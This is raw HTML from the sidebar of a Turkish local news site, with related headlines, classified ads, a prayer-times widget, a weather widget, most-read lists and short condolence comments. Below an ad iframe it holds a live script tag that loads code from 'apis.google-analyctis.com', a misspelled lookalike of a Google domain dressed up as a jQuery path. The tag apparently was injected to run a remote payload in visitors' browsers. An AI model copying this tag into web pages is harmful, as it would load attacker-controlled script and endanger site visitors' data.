id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/tavana-astigi-iple-yasamina-son-verdi-h65457.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ekinozunde-yariyil-tatili-genclik-ve-egitim-merkezi-acildi-h65463.html" title="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ekinozunde_yariyil_tatili_genclik_ve_egitim_merkezi_acildi_h65463_c35ab.jpg" alt="Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim Merkezi açıldı" /> <span>Ekinözü’nde Yarıyıl Tatili Gençlik ve Eğitim...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ehliyet-sinavi-icin-il-merkezine-gitme-devri-sona-eriyor-h65462.html" title="Ehliyet sınavı için il merkezine gitme devri sona eriyor"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ehliyet_sinavi_icin_il_merkezine_gitme_devri_sona_eriyor_h65462_90a68.jpg" alt="Ehliyet sınavı için il merkezine gitme devri sona eriyor" /> <span>Ehliyet sınavı için il merkezine gitme devri sona...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ihtiyac-sahibi-ailelere-5-milyon-536-bin-tllik-yardim-eli-uzandi-h65461.html" title="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ihtiyac_sahibi_ailelere_5_milyon_536_bin_tllik_yardim_eli_uzandi_h65461_1a5e1.jpg" alt="İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik yardım eli uzandı" /> <span>İhtiyaç sahibi ailelere 5 milyon 536 bin TL’lik...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-soba-zehirlenmesi-can-aldi-h65459.html" title="Elbistan’da soba zehirlenmesi can aldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elbistanda_soba_zehirlenmesi_can_aldi_h65459_6e788.jpg" alt="Elbistan’da soba zehirlenmesi can aldı" /> <span>Elbistan’da soba zehirlenmesi can aldı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/girisim-grubu-uyeleri-baskan-paksoyu-ziyaret-etti-h65458.html" title="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/girisim_grubu_uyeleri_baskan_paksoyu_ziyaret_etti_h65458_a53df.jpg" alt="Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret etti" /> <span>Girişim Grubu Üyeleri Başkan Paksoy’u ziyaret...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/linyit-komuru-nano-teknolojik-urunlere-donusuyor-h65453.html" title="Linyit kömürü, nano teknolojik ürünlere dönüşüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/linyit_komuru_nano_teknolojik_urunlere_donusuyor_h65453_56d77.jpg" alt="Linyit kömürü, nano teknolojik ürünlere dönüşüyor" /> <span>Linyit kömürü, nano teknolojik ürünlere dönüşüyor</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/tpao-kahramanmarasta-petrol-arayacak-h65452.html" title="TPAO, Kahramanmaraş’ta petrol arayacak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/tpao_kahramanmarasta_petrol_arayacak_h65452_56ffb.jpg" alt="TPAO, Kahramanmaraş’ta petrol arayacak" /> <span>TPAO, Kahramanmaraş’ta petrol arayacak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html" title="Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/bekleme_alanlarindaki_koltuklara_kesilerek_zarar_veriliyor_h65451_39b95.jpg" alt="Bekleme alanlarındaki koltuklara kesilerek zarar veriliyor" /> <span>Bekleme alanlarındaki koltuklara kesilerek zarar...</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/dogalgazli-yeni-bakimli-31-konforlu-daire-12186.html" title="DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE" >DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/dogalgazli-yeni-bakimli-31-konforlu-daire-12186.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="DOĞALGAZLI-YENİ BAKIMLI 3+1 KONFORLU DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bebekcocuk-bakici-12184.html" title="Bebek&amp;Çocuk Bakici" >Bebek&amp;Çocuk Bakici</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bebekcocuk-bakici-12184.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bebek&amp;Çocuk Bakici" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sekreterlik-12182.html" title="Sekreterlik" >Sekreterlik</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sekreterlik-12182.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Sekreterlik" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/iste-firsat-12162.html" title="İŞTE FIRSAT!" >İŞTE FIRSAT!</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/iste-firsat-12162.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İŞTE FIRSAT!" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/halit-solak-0536-525-99-22-12161.html" title="Halit SOLAK 0536 525 99 22" >Halit SOLAK 0536 525 99 22</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/halit-solak-0536-525-99-22-12161.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Halit SOLAK 0536 525 99 22" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepe-de-mustakil-ev-12157.html" title="ESENTEPE&#039;DE MÜSTAKİL EV" >ESENTEPE&#039;DE MÜSTAKİL EV</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepe-de-mustakil-ev-12157.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/c9b1ba8c9e76fbe2816ed20f98320e3449085555.jpg" alt="ESENTEPE&#039;DE MÜSTAKİL EV" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-ev-anayol-uzeri-12156.html" title="SATILIK MÜSTAKİL EV ANAYOL ÜZERİ" >SATILIK MÜSTAKİL EV ANAYOL ÜZERİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-mustakil-ev-anayol-uzeri-12156.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/d3bee015f23a4723d3bcd839fb614da25748bef5.jpg" alt="SATILIK MÜSTAKİL EV ANAYOL ÜZERİ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12151.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12151.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kisla-caddesinde-satilik-kaloroferli-31-daire-12142.html" title="Kışla caddesinde satılık kaloröferli 3+1 daire" >Kışla caddesinde satılık kaloröferli 3+1 daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kisla-caddesinde-satilik-kaloroferli-31-daire-12142.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/bd608130e9d8496963ec3095091d6592ffae6aa3.jpg" alt="Kışla caddesinde satılık kaloröferli 3+1 daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisicak-bayan-eleman-12134.html" title="HUKUK BÜROSUNDA ÇALIŞICAK BAYAN ELEMAN" >HUKUK BÜROSUNDA ÇALIŞICAK BAYAN ELEMAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisicak-bayan-eleman-12134.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="HUKUK BÜROSUNDA ÇALIŞICAK BAYAN ELEMAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangirelektirikdecalisacakbirbayanalinacak-12130.html" title="cihangir.elektirikde.calişacak.bir.bayan.alinacak" >cihangir.elektirikde.calişacak.bir.bayan.alinacak</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangirelektirikdecalisacakbirbayanalinacak-12130.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/fceff3d57545d2f8a471cb351ce50a8b4b532c54.jpg" alt="cihangir.elektirikde.calişacak.bir.bayan.alinacak" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesi-12127.html" title="Osmanlı Caddesi" >Osmanlı Caddesi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/osmanli-caddesi-12127.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Osmanlı Caddesi" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/celebihan-kafe-ve-esvap-moda-ilgi-magzasi-12123.html" title="ÇELEBİHAN KAFE ve ESVAP MODA İLGİ MAĞZASI" >ÇELEBİHAN KAFE ve ESVAP MODA İLGİ MAĞZASI</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/celebihan-kafe-ve-esvap-moda-ilgi-magzasi-12123.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ÇELEBİHAN KAFE ve ESVAP MODA İLGİ MAĞZASI" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12119.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12119.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-daire-12117.html" title="Satlik daire" >Satlik daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satlik-daire-12117.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/ebf8e5d2d708b9a30f87bb030e54846d6e9a6d92.jpg" alt="Satlik daire" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistan-da-bicakli-kavga-1-olu-h65292.html" title="Elbistan#039;da bıçaklı kavga:..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elbistan_da_bicakli_kavga_1_olu_h65292_fe46c.JPG" alt="Elbistan#039;da bıçaklı kavga:..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-da-bicakli-kavga-1-olu-h65292.html" title="" ><span class="en-hit">1.</span> <strong>Elbistan&#039;da bıçaklı kavga:...</strong> <span class="en-spot en-hidden">Elbistan’da boynundan bıçaklanarak ağır yaralanan 20 yaşındaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-avukatin-otomobili-takla-atti-1-olu-3-yarali-h65426.html" title="Elbistanlı avukatın otomobili takla..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/elbistanli_avukatin_otomobili_takla_atti_1_olu_3_yarali_h65426_27a4c.jpg" alt="Elbistanlı avukatın otomobili takla..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-avukatin-otomobili-takla-atti-1-olu-3-yarali-h65426.html" title="" ><span class="en-hit">2.</span> <strong>Elbistanlı avukatın otomobili takla...</strong> <span class="en-spot en-hidden">Elbistan’dan Kahramanmaraş’a giden Av. Enes Köker’in kullandığı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kalbi-duran-11-yasindaki-cocuk-kurtulamadi-h65153.html" title="Kalbi duran 11 yaşındaki çocuk kurtulamadı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/kalbi_duran_11_yasindaki_cocuk_kurtulamadi_h65153_73c0c.jpg" alt="Kalbi duran 11 yaşındaki çocuk kurtulamadı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kalbi-duran-11-yasindaki-cocuk-kurtulamadi-h65153.html" title="" ><span class="en-hit">3.</span> <strong>Kalbi duran 11 yaşındaki çocuk kurtulamadı</strong> <span class="en-spot en-hidden">Elbistan’da, kalbi ve solunumu durmuş şekilde hastaneye getirilen...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/omer-faruk-olker-49-yasinda-h65162.html" title="Ömer Faruk Ölker 49 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/omer_faruk_olker_49_yasinda_h65162_fbb94.jpg" alt="Ömer Faruk Ölker 49 yaşında," ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/omer-faruk-olker-49-yasinda-h65162.html" title="" ><span class="en-hit">4.</span> <strong>Ömer Faruk Ölker 49 yaşında,</strong> <span class="en-spot en-hidden">Ömer Faruk Ölker 49 yaşında,</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/cezayir-de-iskeleden-dusen-elbistanli-usta-hayatini-kaybetti-h65289.html" title="Cezayir#039;de iskeleden düşen Elbistanlı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/cezayir_de_iskeleden_dusen_elbistanli_usta_hayatini_kaybetti_h65289_52827.jpg" alt="Cezayir#039;de iskeleden düşen Elbistanlı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/cezayir-de-iskeleden-dusen-elbistanli-usta-hayatini-kaybetti-h65289.html" title="" ><span class="en-hit">5.</span> <strong>Cezayir&#039;de iskeleden düşen Elbistanlı...</strong> <span class="en-spot en-hidden">Çalışmak için gittiği Cezayir&#039;de 5.kattaki iskeleden düşen...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/cemil-ozkara-h65344.html" title="Cemil Özkara" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/cemil_ozkara_h65344_4b27f.jpg" alt="Cemil Özkara"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cemil-ozkara-h65344.html" title="" ><span class="en-hit">1.</span> <strong>Cemil Özkara</strong> <span class="en-spot en-hidden">Cemil Özkara</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/celal-kecebir-79-yasinda-h65356.html" title="Celal Keçebir 79 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/celal_kecebir_79_yasinda_h65356_924df.jpg" alt="Celal Keçebir 79 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/celal-kecebir-79-yasinda-h65356.html" title="" ><span class="en-hit">2.</span> <strong>Celal Keçebir 79 yaşında</strong> <span class="en-spot en-hidden">Celal Keçebir 79 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fazli-kozan-56-yasinda-h65304.html" title="Fazlı Kozan 56 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/fazli_kozan_56_yasinda_h65304_ce965.jpg" alt="Fazlı Kozan 56 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fazli-kozan-56-yasinda-h65304.html" title="" ><span class="en-hit">3.</span> <strong>Fazlı Kozan 56 yaşında</strong> <span class="en-spot en-hidden">Fazlı Kozan 56 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/omer-faruk-olker-49-yasinda-h65162.html" title="Ömer Faruk Ölker 49 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/omer_faruk_olker_49_yasinda_h65162_fbb94.jpg" alt="Ömer Faruk Ölker 49 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/omer-faruk-olker-49-yasinda-h65162.html" title="" ><span class="en-hit">4.</span> <strong>Ömer Faruk Ölker 49 yaşında,</strong> <span class="en-spot en-hidden">Ömer Faruk Ölker 49 yaşında,</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/baskan-kilic-somaya-taninan-toleransi-a-termike-de-istiyoruz-h65269.html" title="Başkan Kılıç: Somaya tanınan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/baskan_kilic_somaya_taninan_toleransi_a_termike_de_istiyoruz_h65269_8224f.jpg" alt="Başkan Kılıç: Somaya tanınan..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/baskan-kilic-somaya-taninan-toleransi-a-termike-de-istiyoruz-h65269.html" title="" ><span class="en-hit">5.</span> <strong>Başkan Kılıç: “Soma’ya tanınan...</strong> <span class="en-spot en-hidden">Tes-İş Sendikası Afşin Şube Başkanı Mustafa Kılıç, çevre yatırımlarını...</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/bekleme-alanlarindaki-koltuklara-kesilerek-zarar-veriliyor-h65451.html#comment_285429" title="" >Söylecek kelime bulunmuyor ulan o koltukları...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h65455.html#comment_285428" title="" >devri daim olsun mekanın cennet olsun ölüm...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/tpao-kahramanmarasta-petrol-arayacak-h65452.html#comment_285426" title="" >Bu kadar il varken marasta aramaya ne gerek...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/13-kirsal-mahallede-yol-bakim-calismasi-tamamlandi-h65450.html#comment_285425" title="" >belen tepesinden gubluceye giden yola kum...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/nuri-keskin-73-yasinda-h65424.html#comment_285424" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-etin-h65456.html#comment_285423" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayise-dal-86-yasinda-h65425.html#comment_285422" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html#comment_285421" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/eslem-sare-koker-5-yasinda-h65433.html#comment_285420" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-zincirkiran-82-yasinda-h65444.html#comment_285419" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/abdullah-kilinc-80-yasinda-h65445.html#comment_285418" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html#comment_285417" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/samet-keven-70-yasinda-h65332.html#comment_285416" title="" >ALLAH rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fatma-etin-h65456.html#comment_285415" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html#comment_285414" title="" >Allah rahmet eylesin 